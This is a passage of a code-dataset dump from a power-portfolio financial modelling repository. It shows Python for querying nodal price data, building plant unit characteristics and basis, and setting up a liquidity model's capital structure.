| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,742 | changliukean/KEAN3 | refs/heads/master | /database/dbPrices.py | from datetime import datetime, date, timedelta
from calendar import monthrange
from database.dbGeneral import HOST, USER, PASSWORD, DATABASE, PROD_DATABASE, config_connection
import pandas as pd
from sqlalchemy import create_engine
def get_historical_lmp(node_id, start_date, end_date, dart, database=PROD_DATABASE):
    """Pull LMP rows for one node over an inclusive delivery-date range.

    Args:
        node_id: Pricing node identifier.
        start_date, end_date: Inclusive delivery_date bounds.
        dart: Day-ahead / real-time market selector string.
        database: Database name; defaults to production.

    Returns:
        DataFrame of matching lmp_new rows.
    """
    db_connection = config_connection(HOST, USER, PASSWORD, database)
    query = (
        "SELECT * FROM lmp_new"
        " WHERE node_id = %s"
        " AND delivery_date >= %s"
        " AND delivery_date <= %s"
        " AND dart = %s;"
    )
    lmp_df = pd.read_sql(query, db_connection, params=[node_id, start_date, end_date, dart])
    db_connection.close()
    return lmp_df
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,743 | changliukean/KEAN3 | refs/heads/master | /model/Portfolio.py | import pandas as pd
from database import dbLBO, dbDispatch, dbPCUC
from utility import dispatchUtils, dateUtils
from model.Entity import Powerplant
from datetime import date
import sys
from pyexcelerate import Workbook
import numpy as np
class Portfolio:
def __init__(self, name, entities=[]):
self.name = name
self.entities = entities
""" Powerplants related operations """
def bulk_prepare_basis(self, start_date, end_date, dart='Day Ahead', market='All', to_database_option=False, to_excel=None):
powerplant_list = [entity for entity in self.entities if entity.type == 'plant']
if market != 'All':
powerplant_list = [ powerplant for powerplant in powerplant_list if powerplant.market == market]
basis_df = pd.DataFrame()
basis_hourly_detail_df = pd.DataFrame()
for powerplant in powerplant_list:
powerplant_basis_df, powerplant_basis_details_df = powerplant.build_basis(start_date, end_date, dart)
basis_df = basis_df.append(powerplant_basis_df)
basis_hourly_detail_df = basis_hourly_detail_df.append(powerplant_basis_details_df)
#
# basis_df.to_csv("basis_df.csv")
basis_df = basis_df.reset_index()
# print (basis_df.columns)
# basis_df = pd.read_csv("basis_df.csv")
portfolio_basis_result_df = pd.melt(basis_df, id_vars=['month','peak_info','plant'],
value_vars=['basis_$','basis_%'],
var_name='instrument',
value_name='value')
portfolio_basis_result_df['instrument_id'] = portfolio_basis_result_df.apply(lambda row: row['plant'] + ' basis - ' + row['peak_info'] + "_" + row['instrument'].split("_")[1], axis=1)
portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
portfolio_basis_result_df = pd.pivot_table(portfolio_basis_result_df, index=['month'], columns=['instrument_id'], values='value', aggfunc=np.sum)
portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
# portfolio_basis_result_df.to_csv("portfolio_basis_result_df.csv")
if to_excel is not None:
# basis_df.to_excel(to_excel, sheet_name='basis')
# basis_df.to_excel(to_excel, sheet_name='detail')
basis_values = [portfolio_basis_result_df.columns] + list(portfolio_basis_result_df.values)
wb = Workbook()
wb.new_sheet('basis', data=basis_values)
wb.save(to_excel)
wb = Workbook()
basis_detail_values = [basis_hourly_detail_df.columns] + list(basis_hourly_detail_df.values)
wb.new_sheet('basis_details', data=basis_detail_values)
wb.save(to_excel.split('.')[0] + "_hourly_detail.xlsx")
return basis_df, basis_hourly_detail_df
def get_powerplant_fromdb(self, initiate_technology=False):
portfolio_with_powerplant_df = dbLBO.get_portfolio_with_powerplant(self.name)
for index, row in portfolio_with_powerplant_df.iterrows():
powerplant = Powerplant(row.powerplant_name,
row.fuel_type,
row.market,
row.node,
row.power_hub,
row.technology_name,
row.power_zone,
row.power_hub_on_peak,
row.power_hub_off_peak,
row.fuel_zone,
row.fuel_hub,
row.summer_fuel_basis,
row.winter_fuel_basis,
row.summer_duct_capacity,
row.summer_base_capacity,
row.winter_duct_capacity,
row.winter_base_capacity,
row.first_plan_outage_start,
row.first_plan_outage_end,
row.second_plan_outage_start,
row.second_plan_outage_end,
row.carbon_cost,
row.source_notes,
row.retirement_date,
row.ownership)
self.entities.append(powerplant)
return self.entities
    def update_portfolio_fromexcel(self, plant_tech_master_file):
        """Placeholder: refresh portfolio-level data from a master Excel file.

        Not yet implemented; the file path parameter is accepted for the
        planned implementation and currently ignored.
        """
        # to be implemented
        pass
def update_powerplants_fromexcel(self, plant_tech_master_file, additional=True):
ready_to_kean_pp_df, ready_to_kean_tech_df = dispatchUtils.load_pp_tech_info(plant_tech_master_file)
if not additional:
dbLBO.put_powerplants(ready_to_kean_pp_df, self.name, overwrite_option=True)
else:
dbLBO.put_powerplants(ready_to_kean_pp_df)
def bulk_convert_uc_dataframe(self, technology_df, scenario, version, start_date, end_date, escalation=0.02, push_to_kean=False):
powerplant_info_list = []
for entity in self.entities:
if isinstance(entity, Powerplant):
powerplant_info_list.append([entity.name,
entity.technology,
entity.fuelType,
entity.market,
entity.powerHub,
entity.powerZone,
entity.powerHubOnPeak,
entity.powerHubOffPeak,
entity.node,
entity.fuelZone,
entity.fuelHub,
entity.summerFuelBasis,
entity.winterFuelBasis,
entity.summerDuctCapacity,
entity.summerBaseCapacity,
entity.winterDuctCapacity,
entity.winterBaseCapacity,
entity.firstPlanOutageStart,
entity.firstPlanOutageEnd,
entity.secondPlanOutageStart,
entity.secondPlanOutageEnd,
entity.carbonCost,
entity.sourceNotes,
entity.retirementDate,
entity.ownership])
powerplant_df = pd.DataFrame(data=powerplant_info_list, columns=['name',
'technology',
'fuel_type',
'market',
'power_hub',
'power_zone',
'power_hub_on_peak',
'power_hub_off_peak',
'node',
'fuel_zone',
'fuel_hub',
'summer_fuel_basis',
'winter_fuel_basis',
'summer_duct_capacity',
'summer_base_capacity',
'winter_duct_capacity',
'winter_base_capacity',
'first_plan_outage_start',
'first_plan_outage_end',
'second_plan_outage_start',
'second_plan_outage_end',
'carbon_cost',
'source_notes',
'retirement_date',
'ownership'])
month_list = dateUtils.get_month_list(start_date, end_date)
merged_simple_uc_df = pd.merge(powerplant_df, technology_df, left_on='technology', right_on='name', how="left")
ready_to_kean_pcuc_df = pd.DataFrame()
for index, row in merged_simple_uc_df.iterrows():
plant_name = row['name_x']
total_plant_temp_df = pd.DataFrame()
temp_ready_to_kean_df = pd.DataFrame(data=month_list, columns=['period'])
""" emissions """
emissions = row['carbon_cost'] * row['emissions_rate'] / 2000.0
if row['market'] == 'CAISO':
emissions = row['carbon_cost'] * row['emissions_rate'] / 2205.0
emissions_temp_ready_to_kean_df = temp_ready_to_kean_df
emissions_temp_ready_to_kean_df['characteristic'] = 'emissions'
emissions_temp_ready_to_kean_df['value'] = emissions_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_escalated_value(emissions, escalation, row['period']), axis=1)
emissions_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(emissions_temp_ready_to_kean_df)
""" forced_outage_value """
forced_outage_value = row['uof']
fov_temp_ready_to_kean_df = temp_ready_to_kean_df
fov_temp_ready_to_kean_df['characteristic'] = 'forced_outage_value'
fov_temp_ready_to_kean_df['value'] = forced_outage_value
fov_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(fov_temp_ready_to_kean_df)
""" fuel_transport """
fuel_transport_summer = row['summer_fuel_basis']
fuel_transport_winter = row['winter_fuel_basis']
ftp_temp_ready_to_kean_df = temp_ready_to_kean_df
ftp_temp_ready_to_kean_df['characteristic'] = 'fuel_transport'
ftp_temp_ready_to_kean_df['value'] = ftp_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, fuel_transport_summer, fuel_transport_winter), axis=1)
ftp_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ftp_temp_ready_to_kean_df)
""" fuel_type """
fuel_type = row['fuel_type']
ft_temp_ready_to_kean_df = temp_ready_to_kean_df
ft_temp_ready_to_kean_df['characteristic'] = 'fuel_type'
ft_temp_ready_to_kean_df['value'] = 0.0
ft_temp_ready_to_kean_df['value_str'] = fuel_type
total_plant_temp_df = total_plant_temp_df.append(ft_temp_ready_to_kean_df)
""" gas_instrument_id """
gas_instrument_id = row['fuel_hub']
gii_temp_ready_to_kean_df = temp_ready_to_kean_df
gii_temp_ready_to_kean_df['characteristic'] = 'gas_instrument_id'
gii_temp_ready_to_kean_df['value'] = 0.0
gii_temp_ready_to_kean_df['value_str'] = gas_instrument_id
total_plant_temp_df = total_plant_temp_df.append(gii_temp_ready_to_kean_df)
""" heatrate_high_load """
heatrate_high_load_summer = row['summer_base_heatrate']
heatrate_high_load_winter = row['winter_base_heatrate']
hhl_temp_ready_to_kean_df = temp_ready_to_kean_df
hhl_temp_ready_to_kean_df['value'] = hhl_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_hr(row, heatrate_high_load_summer, heatrate_high_load_winter), axis=1)
hhl_temp_ready_to_kean_df['characteristic'] = 'heatrate_high_load'
hhl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hhl_temp_ready_to_kean_df)
""" heatrate_max_load """
heatrate_max_load_summer = row['summer_duct_heatrate']
heatrate_max_load_winter = row['winter_duct_heatrate']
hml_temp_ready_to_kean_df = temp_ready_to_kean_df
hml_temp_ready_to_kean_df['value'] = hml_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_hr(row, heatrate_max_load_summer, heatrate_max_load_winter), axis=1)
hml_temp_ready_to_kean_df['characteristic'] = 'heatrate_max_load'
hml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hml_temp_ready_to_kean_df)
""" heatrate_min_load """
heatrate_min_load_summer = row['summer_base_heatrate'] * row['lol_summer_heatrate']
heatrate_min_load_winter = row['winter_base_heatrate'] * row['lol_winter_heatrate']
hminl_temp_ready_to_kean_df = temp_ready_to_kean_df
hminl_temp_ready_to_kean_df['value'] = hminl_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_hr(row, heatrate_min_load_summer, heatrate_min_load_winter), axis=1)
hminl_temp_ready_to_kean_df['characteristic'] = 'heatrate_min_load'
hminl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hminl_temp_ready_to_kean_df)
""" high_load """
high_load_summer = row['summer_base_capacity']
high_load_winter = row['winter_base_capacity']
hl_temp_ready_to_kean_df = temp_ready_to_kean_df
hl_temp_ready_to_kean_df['value'] = hl_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, high_load_summer, high_load_winter), axis=1)
hl_temp_ready_to_kean_df['characteristic'] = 'high_load'
hl_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(hl_temp_ready_to_kean_df)
""" max_load """
max_load_summer = row['summer_duct_capacity']
max_load_winter = row['winter_duct_capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, max_load_summer, max_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'max_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" min_load """
min_load_summer = row['summer_base_capacity'] * row['lol_capacity']
min_load_winter = row['winter_base_capacity'] * row['lol_capacity']
ml_temp_ready_to_kean_df = temp_ready_to_kean_df
ml_temp_ready_to_kean_df['value'] = ml_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, min_load_summer, min_load_winter), axis=1)
ml_temp_ready_to_kean_df['characteristic'] = 'min_load'
ml_temp_ready_to_kean_df['value_str'] = ''
total_plant_temp_df = total_plant_temp_df.append(ml_temp_ready_to_kean_df)
""" offpeak_power_hub_instrument_id """
offpeak_power_hub_instrument_id = row['power_hub_off_peak']
oph_temp_ready_to_kean_df = temp_ready_to_kean_df
oph_temp_ready_to_kean_df['value_str'] = offpeak_power_hub_instrument_id
oph_temp_ready_to_kean_df['value'] = 0.0
oph_temp_ready_to_kean_df['characteristic'] = 'offpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(oph_temp_ready_to_kean_df)
""" onpeak_power_hub_instrument_id """
onpeak_power_hub_instrument_id = row['power_hub_on_peak']
onph_temp_ready_to_kean_df = temp_ready_to_kean_df
onph_temp_ready_to_kean_df['value_str'] = onpeak_power_hub_instrument_id
onph_temp_ready_to_kean_df['value'] = 0.0
onph_temp_ready_to_kean_df['characteristic'] = 'onpeak_power_hub_instrument_id'
total_plant_temp_df = total_plant_temp_df.append(onph_temp_ready_to_kean_df)
""" outage_days """
outage_start_date = row['first_plan_outage_start']
outage_end_date = row['first_plan_outage_end']
od_temp_ready_to_kean_df = temp_ready_to_kean_df
od_temp_ready_to_kean_df['value'] = od_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_outage_days(row, outage_start_date, outage_end_date), axis=1)
od_temp_ready_to_kean_df['value_str'] = ''
od_temp_ready_to_kean_df['characteristic'] = 'outage_days'
total_plant_temp_df = total_plant_temp_df.append(od_temp_ready_to_kean_df)
""" dafault to 0s """
for char in ['ramp_dowm_cold_hours', 'ramp_down_warm_hours', 'ramp_energy_cold', 'ramp_energy_warm', 'ramp_fuel_warm', 'ramp_up_warm_hours']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = 0.0
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
""" ramp_fuel_cold """
ramp_fuel_cold_summer = row['start_fuel'] * row['summer_duct_capacity']
ramp_fuel_cold_winter = row['start_fuel'] * row['winter_duct_capacity']
rfc_temp_ready_to_kean_df = temp_ready_to_kean_df
rfc_temp_ready_to_kean_df['value'] = rfc_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, ramp_fuel_cold_summer, ramp_fuel_cold_winter), axis=1)
rfc_temp_ready_to_kean_df['value_str'] = ''
rfc_temp_ready_to_kean_df['characteristic'] = 'ramp_fuel_cold'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" ramp_up_cold_hours """
ramp_up_cold_hours = row['start_hours']
ruch_temp_ready_to_kean_df = temp_ready_to_kean_df
ruch_temp_ready_to_kean_df['value'] = ramp_up_cold_hours
ruch_temp_ready_to_kean_df['value_str'] = ''
ruch_temp_ready_to_kean_df['characteristic'] = 'ramp_up_cold_hours'
total_plant_temp_df = total_plant_temp_df.append(rfc_temp_ready_to_kean_df)
""" start_cost """
start_cost_summer = row['start_expense'] * row['summer_duct_capacity']
start_cost_winter = row['start_expense'] * row['winter_duct_capacity']
sc_temp_ready_to_kean_df = temp_ready_to_kean_df
sc_temp_ready_to_kean_df['value'] = sc_temp_ready_to_kean_df.apply(lambda row: dispatchUtils.get_load(row, start_cost_summer, start_cost_winter), axis=1)
sc_temp_ready_to_kean_df['value_str'] = ''
sc_temp_ready_to_kean_df['characteristic'] = 'start_cost'
total_plant_temp_df = total_plant_temp_df.append(sc_temp_ready_to_kean_df)
""" units """
u_temp_char_df = temp_ready_to_kean_df
u_temp_char_df['value'] = 1
u_temp_char_df['value_str'] = ''
u_temp_char_df['characteristic'] = 'units'
total_plant_temp_df = total_plant_temp_df.append(u_temp_char_df)
""" vom_high_load vom_max_load vom_min_load """
vom = row['vom']
for char in ['vom_high_load', 'vom_max_load', 'vom_min_load']:
temp_char_df = temp_ready_to_kean_df
temp_char_df['value'] = temp_char_df.apply(lambda row: dispatchUtils.get_escalated_value(vom, escalation, row['period']), axis=1)
temp_char_df['value_str'] = ''
temp_char_df['characteristic'] = char
total_plant_temp_df = total_plant_temp_df.append(temp_char_df)
total_plant_temp_df['entity'] = plant_name
total_plant_temp_df['unit'] = 'all'
total_plant_temp_df['scenario'] = scenario
total_plant_temp_df['version'] = version
ready_to_kean_pcuc_df = ready_to_kean_pcuc_df.append(total_plant_temp_df)
if push_to_kean:
dbPCUC.put_characteristics(ready_to_kean_pcuc_df, scenario, version)
return ready_to_kean_pcuc_df
""" Liquidity related operations """
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
from scenario_control.Scenario import Scenario, ScenarioMaster
from datetime import date, timedelta
from dateutil import relativedelta
from utility.dateUtils import get_date_obj_from_str
from calendar import monthrange
import numpy as np
from decimal import *
import pandas as pd
import sys
from scipy.optimize import fsolve
from utility import dateUtils
from database import dbLiquidity
# NOTE(review): stray module-level debug leftover — `a` is never used in this
# file; confirm nothing does `from liquidity.Liquidity import a` before removing.
a=1
class Liquidity:
def __init__(self,
             portfolio,
             liquidity_scenario,
             liquidity_version,
             metadata=None,
             table='placeholder'):
    """Assemble a full liquidity model for *portfolio*.

    Loads the scenario master from the database, then derives the
    assumptions, interest rates, capital structure, waterfall, fixed
    assets and metadata from it via the private initializers below.

    Parameters
    ----------
    portfolio : portfolio identifier, passed through to every DB lookup.
    liquidity_scenario, liquidity_version : scenario coordinates of this
        liquidity run.
    metadata : accepted for backward compatibility but never read —
        ``self.metadata`` is always rebuilt by ``__initialize_metadata()``.
        (Default changed from the mutable ``{}`` to ``None``: a shared
        mutable default is a classic Python pitfall, and since the
        argument was never used, behavior is unchanged.)
    table : table name recorded on the liquidity ``Scenario``.
    """
    self.portfolio = portfolio
    self.scenarioMaster = ScenarioMaster(Scenario('liquidity', table, portfolio, liquidity_scenario, liquidity_version))
    # ScenarioMaster stores all the related scenario-master information for a liquidity run:
    # 1. financials: all financial information for the liquidity scenario including
    #    Adj EBITDA, CAPEX, actual cash beginning and ending balances, etc.
    #    1.1 libor curves accompany the financials SM object
    # 2. capital structure scenario: Operating Company, Term Loans, Equity, Revolver
    # 3. waterfall structure scenario: how cash should flow and the priorities of
    #    different tier debts
    # 4. liquidity assumptions scenario/version: forced values for change in working
    #    capital, other cash use, and revolver draw / pay back
    # 5. interest rate scenario/version: libor rates stored in the prices table
    # 6. dates and time information, e.g. forecast start date, actuals begin date
    self.scenarioMaster.load_sm_fromdb()
    self.scenarioMaster.load_scenario_datetime_fromdb()
    self.assumptions = self.__initialize_liquidity_assumptions()
    # scenario assumptions related to the liquidity process, including items like
    # change in working capital, other cash use, projected revolver draw and repay
    self.interestRates = self.__initialize_interest_rate()
    # a dataframe of interest rates, used within the liquidity module in multiple places
    self.capitalStructure = self.__initialize_captital_structure()
    # capital structure is the list of instruments this liquidity model has;
    # built from this object's scenarioMaster information
    self.waterfall = self.__initialize_waterfall()
    # waterfall information is a dataframe of cash inflow/outflow orders and priorities;
    # positive inflow is income, negative inflow is an outflow or expense
    self.fixedAssets = self.__initializ_fixed_asset_depreciation()
    # fixed-asset objects used for the tax distribution calculation
    # NOTE(review): the initializer name is missing an 'e' ("__initializ...");
    # it is defined elsewhere in this class — confirm before renaming.
    self.metadata = self.__initialize_metadata()
    # a dictionary of dataframes that stores all supporting information
def __initialize_liquidity_assumptions(self):
    """Fetch the liquidity-assumptions dataframe for this run.

    Finds the input scenario whose module is 'liquidity_assumptions'
    (raises IndexError when the scenario master has none) and loads the
    matching assumptions — change in working capital, other cash use,
    projected revolver activity — from the database.
    """
    matches = [s for s in self.scenarioMaster.inputScenarios
               if s.module == 'liquidity_assumptions']
    assumptions_scenario = matches[0]
    return dbLiquidity.get_scenario_assumptions(
        self.portfolio,
        assumptions_scenario.scenario,
        assumptions_scenario.version,
    )
def __initialize_interest_rate(self):
    """Fetch the interest-rate (libor) curves dataframe for this run.

    Looks up the 'interest_rate' input scenario once and loads its
    curves from the database. (The original scanned the scenario list
    with the identical comprehension twice — once for the scenario name
    and once for the version.)
    """
    rate_scenario = [s for s in self.scenarioMaster.inputScenarios
                     if s.module == 'interest_rate'][0]
    return dbLiquidity.get_curves(rate_scenario.scenario, rate_scenario.version)
def __initialize_captital_structure(self):
    """Build the list of capital-structure component objects for this run.

    Reads the capital-structure rows (long format: one row per
    component/field_name) for the 'cap_structure' input scenario and
    constructs one object per distinct component: Revolver, FloatingDebt
    / FixedDebt (TLB/TLC), OperatingCompany, TaxRegister, Swap, Equity.
    Stores the resulting list on self.capitalStructure and returns it.

    NOTE(review): the method name misspells "capital"; renaming would
    also require updating the call in __init__.
    """
    # 1. capital structure: locate the cap_structure input scenario
    capital_structure = [input_scenario for input_scenario in self.scenarioMaster.inputScenarios if input_scenario.module == 'cap_structure'][0]
    capital_structure_scenario = capital_structure.scenario
    capital_structure_version = capital_structure.version
    capital_structure_df = dbLiquidity.get_capital_structure(self.portfolio, capital_structure_scenario, capital_structure_version)
    """ for each component the instrument id field should be called label so to be able to get the distinct components """
    unique_components_df = capital_structure_df.loc[capital_structure_df.field_name=='label']
    # NOTE: `capital_structure` is rebound here from the scenario object above
    # to the result list — confusing but intentional.
    capital_structure = []
    for index, row in unique_components_df.iterrows():
        component = row['capital_component']
        # all field rows belonging to this component, in long format
        component_cap_structure_df = capital_structure_df.loc[capital_structure_df.capital_component==component].copy()
        if component == 'Revolver':
            credit_line = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'credit_line'].iloc[0]['value'])
            min_cash_reserve_revolver = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'min_cash_reserve_revolver'].iloc[0]['value'])
            """ multiple margin records """
            # each margin record carries its own effective date window
            margins = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'margin'][['value','effective_start_date', 'effective_end_date']].values.tolist()
            index = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'index'].iloc[0]['value']
            instrument_id = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'label'].iloc[0]['value']
            issue_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'issue_date'].iloc[0]['value'])
            maturity_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'maturity_date'].iloc[0]['value'])
            term = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'term'].iloc[0]['value'])
            initial_balance = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'initial_balance'].iloc[0]['value'])
            interest_start_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'interest_start_date'].iloc[0]['value'])
            # sentinel date: the revolver has no scheduled amortization start
            amort_start_date = date(1900,1,1)
            periodicity_months = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'periodicity_months'].iloc[0]['value'])
            annual_scheduled_amort = 0
            day_count = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'day_count'].iloc[0]['value']
            # NOTE(review): kept as a string here, unlike the float() casts on the
            # other numeric fields (and unlike min_cash_reserve_revolver above,
            # which reads the same row) — confirm whether Revolver expects a string.
            min_cash_reserve_prepay = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'min_cash_reserve_revolver'].iloc[0]['value']
            # fixed defaults for a revolver; these fields only apply to term debt
            sweep_percent=1
            dsra_months=0
            oids=[]
            dfcs=[]
            oid_payments={}
            dfc_payments={}
            upsizes={}
            prepays={}
            effective_interest_rates={}
            interest_payments={}
            required_dsras={}
            dsra_cash_movement={}
            amortizations={}
            principal_balances ={}
            flag_prepayable=True
            flag_historicals = True if component_cap_structure_df.loc[component_cap_structure_df.field_name == 'flag_historicals'].iloc[0]['value'] == 'TRUE' else False
            revolver = Revolver(credit_line,
                                min_cash_reserve_revolver,
                                margins,
                                index,
                                instrument_id,
                                issue_date,
                                maturity_date,
                                term,
                                initial_balance,
                                interest_start_date,
                                amort_start_date,
                                periodicity_months,
                                annual_scheduled_amort,
                                min_cash_reserve_prepay,
                                day_count,
                                sweep_percent,
                                dsra_months,
                                oids,
                                dfcs,
                                oid_payments,
                                dfc_payments,
                                upsizes,
                                prepays,
                                effective_interest_rates,
                                interest_payments,
                                required_dsras,
                                dsra_cash_movement,
                                amortizations,
                                principal_balances,
                                flag_prepayable,
                                flag_historicals)
            revolver.set_historical_revolver_change(self.scenarioMaster.forecastStartMonth)
            revolver.set_projected_revolver_change(self.scenarioMaster.forecastStartMonth, self.assumptions)
            """ revolver has no floor on interest rates """
            revolver.set_effective_interest_rates(self.interestRates, self.scenarioMaster.forecastStartMonth)
            capital_structure.append(revolver)
        if component in ['TLB', 'TLC']:
            margins = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'margin'][['value','effective_start_date', 'effective_end_date']].values.tolist()
            index = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'index']['value'].iloc[0]
            instrument_id = component_cap_structure_df.loc[component_cap_structure_df.field_name == 'label'].iloc[0]['value']
            issue_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'issue_date'].iloc[0]['value'])
            maturity_date = get_date_obj_from_str(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'maturity_date'].iloc[0]['value'])
            term = float(component_cap_structure_df.loc[component_cap_structure_df.field_name == 'term'].iloc[0]['value'])
